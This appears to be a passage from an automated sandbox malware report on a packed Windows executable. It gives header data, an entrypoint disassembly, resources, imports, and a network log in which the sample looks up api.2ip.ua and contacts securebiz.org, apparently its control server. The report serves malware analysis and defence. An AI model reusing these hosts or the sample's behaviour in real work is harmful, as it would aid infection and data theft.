                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:0
                                                                                    File Version Major:5
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:d33805713bf84c5172011e6ee58dcc60

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    call 00007FB7C4B97561h
                                                                                    jmp 00007FB7C4B908AEh
                                                                                    mov edi, edi
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                    xor ecx, ecx
                                                                                    cmp eax, dword ptr [004AD128h+ecx*8]
                                                                                    je 00007FB7C4B90A45h
                                                                                    inc ecx
                                                                                    cmp ecx, 2Dh
                                                                                    jc 00007FB7C4B90A23h
                                                                                    lea ecx, dword ptr [eax-13h]
                                                                                    cmp ecx, 11h
                                                                                    jnbe 00007FB7C4B90A40h
                                                                                    push 0000000Dh
                                                                                    pop eax
                                                                                    pop ebp
                                                                                    ret
                                                                                    mov eax, dword ptr [004AD12Ch+ecx*8]
                                                                                    pop ebp
                                                                                    ret
                                                                                    add eax, FFFFFF44h
                                                                                    push 0000000Eh
                                                                                    pop ecx
                                                                                    cmp ecx, eax
                                                                                    sbb eax, eax
                                                                                    and eax, ecx
                                                                                    add eax, 08h
                                                                                    pop ebp
                                                                                    ret
                                                                                    call 00007FB7C4B94F19h
                                                                                    test eax, eax
                                                                                    jne 00007FB7C4B90A38h
                                                                                    mov eax, 004AD290h
                                                                                    ret
                                                                                    add eax, 08h
                                                                                    ret
                                                                                    call 00007FB7C4B94F06h
                                                                                    test eax, eax
                                                                                    jne 00007FB7C4B90A38h
                                                                                    mov eax, 004AD294h
                                                                                    ret
                                                                                    add eax, 0Ch
                                                                                    ret
                                                                                    mov edi, edi
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    call 00007FB7C4B90A17h
                                                                                    mov ecx, dword ptr [ebp+08h]
                                                                                    push ecx
                                                                                    mov dword ptr [eax], ecx
                                                                                    call 00007FB7C4B909B7h
                                                                                    pop ecx
                                                                                    mov esi, eax
                                                                                    call 00007FB7C4B909F1h
                                                                                    mov dword ptr [eax], esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    ret
                                                                                    mov edi, edi
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 4Ch
                                                                                    mov eax, dword ptr [004AD2A8h]
                                                                                    xor eax, ebp
                                                                                    mov dword ptr [ebp-04h], eax
                                                                                    push ebx
                                                                                    xor ebx, ebx
                                                                                    push esi
                                                                                    mov esi, dword ptr [ebp+08h]
                                                                                    push edi
                                                                                    mov dword ptr [ebp-2Ch], ebx
                                                                                    mov dword ptr [ebp-1Ch], ebx
                                                                                    mov dword ptr [ebp-20h], ebx
                                                                                    mov dword ptr [ebp-28h], ebx
                                                                                    mov dword ptr [ebp-24h], ebx
                                                                                    mov dword ptr [ebp-4Ch], esi
                                                                                    mov dword ptr [ebp-48h], ebx
                                                                                    cmp dword ptr [esi+14h], ebx

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0xac8d00x4f.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xabf2c0x28.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x1d320.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xa72100x1c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa9a600x40.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xa70000x1b0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000xa60000xa6000False0.948776061276data7.96151049011IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0xa70000x591f0x5a00False0.312890625data4.55765661744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xad0000xc4fc0x2600False0.212273848684data2.6700249264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0xba0000x1d3200x1d400False0.663244524573data6.44493495277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    BUJAHAGIRAMOMEVAXESAB0xd4b000x636ASCII text, with very long lines, with no line terminatorsFrenchLuxembourg
                                                                                    YOCUSIDIHEBOSIZORIYEPASUGIHAXEDO0xd44780x685ASCII text, with very long lines, with no line terminatorsFrenchLuxembourg
                                                                                    RT_CURSOR0xd51a80x130data
                                                                                    RT_CURSOR0xd52f00xea8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
                                                                                    RT_CURSOR0xd61980x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
                                                                                    RT_ICON0xbaa700xea8dataEnglishUnited States
                                                                                    RT_ICON0xbb9180x8a8dataEnglishUnited States
                                                                                    RT_ICON0xbc1c00x6c8dataEnglishUnited States
                                                                                    RT_ICON0xbc8880x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                    RT_ICON0xbcdf00x25a8dataEnglishUnited States
                                                                                    RT_ICON0xbf3980x10a8dataEnglishUnited States
                                                                                    RT_ICON0xc04400x988dataEnglishUnited States
                                                                                    RT_ICON0xc0dc80x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                    RT_ICON0xc12a80xea8dataEnglishUnited States
                                                                                    RT_ICON0xc21500x8a8dataEnglishUnited States
                                                                                    RT_ICON0xc29f80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                    RT_ICON0xc2f600x25a8dataEnglishUnited States
                                                                                    RT_ICON0xc55080x10a8dataEnglishUnited States
                                                                                    RT_ICON0xc65b00x988dataEnglishUnited States
                                                                                    RT_ICON0xc6f380x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                    RT_ICON0xc74080xea8dataEnglishUnited States
                                                                                    RT_ICON0xc82b00x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 11579566, next used block 14210779EnglishUnited States
                                                                                    RT_ICON0xc8b580x6c8dataEnglishUnited States
                                                                                    RT_ICON0xc92200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                    RT_ICON0xc97880x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                    RT_ICON0xcbd300x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 669034958, next used block 719231181EnglishUnited States
                                                                                    RT_ICON0xccdd80x988dataEnglishUnited States
                                                                                    RT_ICON0xcd7600x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                    RT_ICON0xcdc400xea8dataEnglishUnited States
                                                                                    RT_ICON0xceae80x8a8dataEnglishUnited States
                                                                                    RT_ICON0xcf3900x6c8dataEnglishUnited States
                                                                                    RT_ICON0xcfa580x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                    RT_ICON0xcffc00x25a8dataEnglishUnited States
                                                                                    RT_ICON0xd25680x10a8dataEnglishUnited States
                                                                                    RT_ICON0xd36100x988dataEnglishUnited States
                                                                                    RT_ICON0xd3f980x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                    RT_STRING0xd6c180x2e2dataFrenchLuxembourg
                                                                                    RT_STRING0xd6f000x41edataFrenchLuxembourg
                                                                                    RT_ACCELERATOR0xd51380x48dataFrenchLuxembourg
                                                                                    RT_ACCELERATOR0xd51800x18dataFrenchLuxembourg
                                                                                    RT_GROUP_CURSOR0xd52d80x14data
                                                                                    RT_GROUP_CURSOR0xd6a400x22data
                                                                                    RT_GROUP_ICON0xc12300x76dataEnglishUnited States
                                                                                    RT_GROUP_ICON0xcdbc80x76dataEnglishUnited States
                                                                                    RT_GROUP_ICON0xd44000x76dataEnglishUnited States
                                                                                    RT_GROUP_ICON0xc73a00x68dataEnglishUnited States
                                                                                    RT_VERSION0xd6a680x1b0data
                                                                                    None0xd51980xadata

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllHeapReAlloc, GlobalDeleteAtom, GetLocaleInfoA, InterlockedIncrement, GetQueuedCompletionStatus, GetEnvironmentStringsW, SetEvent, ReadConsoleW, GetCommandLineA, CreateActCtxW, GlobalAlloc, CopyFileW, FreeConsole, LeaveCriticalSection, GetFileAttributesA, HeapCreate, WriteConsoleW, GetModuleFileNameW, lstrlenW, ReleaseSemaphore, SetConsoleTitleA, FlushFileBuffers, DeactivateActCtx, InterlockedExchange, GetProcAddress, BeginUpdateResourceW, RemoveDirectoryA, VerLanguageNameW, LocalAlloc, SetConsoleWindowInfo, SetEnvironmentVariableA, SetConsoleTitleW, GetModuleHandleA, EraseTape, VirtualProtect, EndUpdateResourceA, FindFirstVolumeW, GetCurrentProcessId, GetPrivateProfileSectionW, FindNextVolumeA, lstrcpyW, GetConsoleOutputCP, WideCharToMultiByte, InterlockedDecrement, InterlockedCompareExchange, MultiByteToWideChar, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, GetLastError, HeapFree, HeapAlloc, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, GetCPInfo, RtlUnwind, RaiseException, LCMapStringW, LCMapStringA, GetStringTypeW, VirtualFree, VirtualAlloc, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, SetHandleCount, GetFileType, GetStartupInfoA, SetFilePointer, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetStringTypeA, HeapSize, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, InitializeCriticalSectionAndSpinCount, LoadLibraryA, CloseHandle, CreateFileA, SetStdHandle, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, SetEndOfFile, GetProcessHeap, ReadFile, WriteConsoleA

                                                                                    Exports

                                                                                    NameOrdinalAddress
                                                                                    @SetFirstVice@810x401787

                                                                                    Version Infos

                                                                                    DescriptionData
                                                                                    InternalNamesajbmianozu.iya
                                                                                    ProductVersion2.4.59.42
                                                                                    CopyrightCopyrighz (C) 2021, fudkagat
                                                                                    Translation0x0127 0x007a

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    FrenchLuxembourg
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 4, 2021 12:29:56.458451986 CEST49750443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:29:56.458498955 CEST4434975077.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:29:56.458674908 CEST49750443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:29:56.499696970 CEST49750443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:29:56.499732018 CEST4434975077.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:29:56.616485119 CEST4434975077.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:29:56.616595984 CEST49750443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:29:57.270551920 CEST49750443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:29:57.270586967 CEST4434975077.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:29:57.270970106 CEST4434975077.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:29:57.271058083 CEST49750443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:29:57.273943901 CEST49750443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:29:57.319144011 CEST4434975077.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:29:57.381719112 CEST4434975077.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:29:57.381829023 CEST49750443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:29:57.381845951 CEST4434975077.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:29:57.381860018 CEST4434975077.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:29:57.381901026 CEST49750443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:29:57.387315035 CEST49750443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:29:57.387343884 CEST4434975077.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:09.384370089 CEST49751443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:09.384418964 CEST4434975177.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:09.384535074 CEST49751443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:09.402363062 CEST49751443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:09.402380943 CEST4434975177.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:09.494304895 CEST4434975177.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:09.495032072 CEST49751443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:09.504722118 CEST49751443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:09.504745007 CEST4434975177.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:09.505151987 CEST4434975177.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:09.505475044 CEST49751443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:09.517652035 CEST49751443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:09.559134007 CEST4434975177.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:09.582607031 CEST4434975177.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:09.582685947 CEST4434975177.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:09.582889080 CEST49751443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:09.585237980 CEST49751443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:09.585261106 CEST4434975177.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:15.894740105 CEST49752443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:15.894783974 CEST4434975277.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:15.894867897 CEST49752443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:15.952733040 CEST49752443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:15.952766895 CEST4434975277.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.045123100 CEST4434975277.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.045255899 CEST49752443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.101031065 CEST49752443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.101066113 CEST4434975277.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.101630926 CEST4434975277.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.101708889 CEST49752443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.115323067 CEST49752443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.159147978 CEST4434975277.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.163055897 CEST4434975277.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.163157940 CEST49752443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.163177013 CEST4434975277.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.163224936 CEST49752443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.164190054 CEST49752443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.164216042 CEST4434975277.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.769728899 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.769790888 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.770323992 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.818346024 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.818398952 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.914412022 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.914525986 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.941186905 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.941226959 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.941611052 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.942096949 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.946628094 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:16.987145901 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:17.004074097 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:17.004153013 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:17.005218029 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:17.006035089 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:17.006072044 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.350580931 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.350665092 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.350857019 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.377549887 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.377612114 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.490098000 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.490227938 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.501593113 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.501635075 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.502064943 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.502609968 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.506625891 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.551153898 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.601296902 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.601389885 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.601627111 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.602968931 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.603014946 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:26.202029943 CEST4975780192.168.2.3123.213.233.194
                                                                                    Oct 4, 2021 12:30:26.463438988 CEST8049757123.213.233.194192.168.2.3
                                                                                    Oct 4, 2021 12:30:26.465034962 CEST4975780192.168.2.3123.213.233.194
                                                                                    Oct 4, 2021 12:30:26.466541052 CEST4975780192.168.2.3123.213.233.194
                                                                                    Oct 4, 2021 12:30:26.937055111 CEST8049757123.213.233.194192.168.2.3
                                                                                    Oct 4, 2021 12:30:27.236531019 CEST8049757123.213.233.194192.168.2.3
                                                                                    Oct 4, 2021 12:30:27.236567974 CEST8049757123.213.233.194192.168.2.3
                                                                                    Oct 4, 2021 12:30:27.247159958 CEST4975780192.168.2.3123.213.233.194
                                                                                    Oct 4, 2021 12:30:27.247198105 CEST4975780192.168.2.3123.213.233.194
                                                                                    Oct 4, 2021 12:30:27.508488894 CEST8049757123.213.233.194192.168.2.3

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 4, 2021 12:29:42.401590109 CEST6402153192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:29:42.419686079 CEST53640218.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:29:56.234675884 CEST6078453192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:29:56.254905939 CEST53607848.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:09.353683949 CEST5114353192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:09.373421907 CEST53511438.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:15.825882912 CEST5600953192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:15.845464945 CEST53560098.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.677743912 CEST5902653192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:16.722148895 CEST53590268.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:16.842492104 CEST4957253192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:16.870182037 CEST53495728.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.317594051 CEST6082353192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:25.334136009 CEST53608238.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.832859039 CEST5213053192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:26.199101925 CEST53521308.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:32.952759027 CEST5510253192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:32.970946074 CEST53551028.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:36.823662043 CEST5623653192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:36.842174053 CEST53562368.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:40.005192041 CEST5652753192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:40.023348093 CEST53565278.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:41.382445097 CEST4955953192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:41.415884018 CEST53495598.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:47.200792074 CEST5265053192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:47.220890045 CEST53526508.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:48.287276983 CEST6329753192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:48.314697981 CEST53632978.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:30:59.966880083 CEST5836153192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:30:59.994196892 CEST53583618.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:03.143915892 CEST5361553192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:03.198260069 CEST53536158.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:03.691585064 CEST5072853192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:03.727349043 CEST53507288.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:04.277308941 CEST5377753192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:04.311285973 CEST53537778.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:04.704011917 CEST5710653192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:04.722734928 CEST53571068.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:05.211041927 CEST6035253192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:05.230017900 CEST53603528.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:05.334882021 CEST5677353192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:05.362386942 CEST53567738.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:05.858396053 CEST6098253192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:05.878504992 CEST53609828.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:06.393841028 CEST5805853192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:06.410753012 CEST53580588.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:07.089411974 CEST6436753192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:07.123636007 CEST53643678.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:07.834609985 CEST5153953192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:07.856875896 CEST53515398.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:08.638855934 CEST5539353192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:08.673464060 CEST53553938.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:16.744683027 CEST5058553192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:16.771209002 CEST53505858.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:19.253896952 CEST6345653192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:19.270412922 CEST53634568.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:21.005276918 CEST5854053192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:21.022428989 CEST53585408.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:36.873965979 CEST5510853192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:36.891241074 CEST53551088.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:38.482980013 CEST5894253192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:38.509351969 CEST53589428.8.8.8192.168.2.3
                                                                                    Oct 4, 2021 12:31:58.314634085 CEST6443253192.168.2.38.8.8.8
                                                                                    Oct 4, 2021 12:31:58.349678040 CEST53644328.8.8.8192.168.2.3

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Oct 4, 2021 12:29:56.234675884 CEST192.168.2.38.8.8.80x4749Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:09.353683949 CEST192.168.2.38.8.8.80x5366Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:15.825882912 CEST192.168.2.38.8.8.80x7199Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:16.677743912 CEST192.168.2.38.8.8.80xd753Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:25.317594051 CEST192.168.2.38.8.8.80x9b6aStandard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:25.832859039 CEST192.168.2.38.8.8.80xf036Standard query (0)securebiz.orgA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Oct 4, 2021 12:29:56.254905939 CEST8.8.8.8192.168.2.30x4749No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:09.373421907 CEST8.8.8.8192.168.2.30x5366No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:15.845464945 CEST8.8.8.8192.168.2.30x7199No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:16.722148895 CEST8.8.8.8192.168.2.30xd753No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:25.334136009 CEST8.8.8.8192.168.2.30x9b6aNo error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:26.199101925 CEST8.8.8.8192.168.2.30xf036No error (0)securebiz.org123.213.233.194A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:26.199101925 CEST8.8.8.8192.168.2.30xf036No error (0)securebiz.org210.207.244.101A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:26.199101925 CEST8.8.8.8192.168.2.30xf036No error (0)securebiz.org175.117.131.126A (IP address)IN (0x0001)
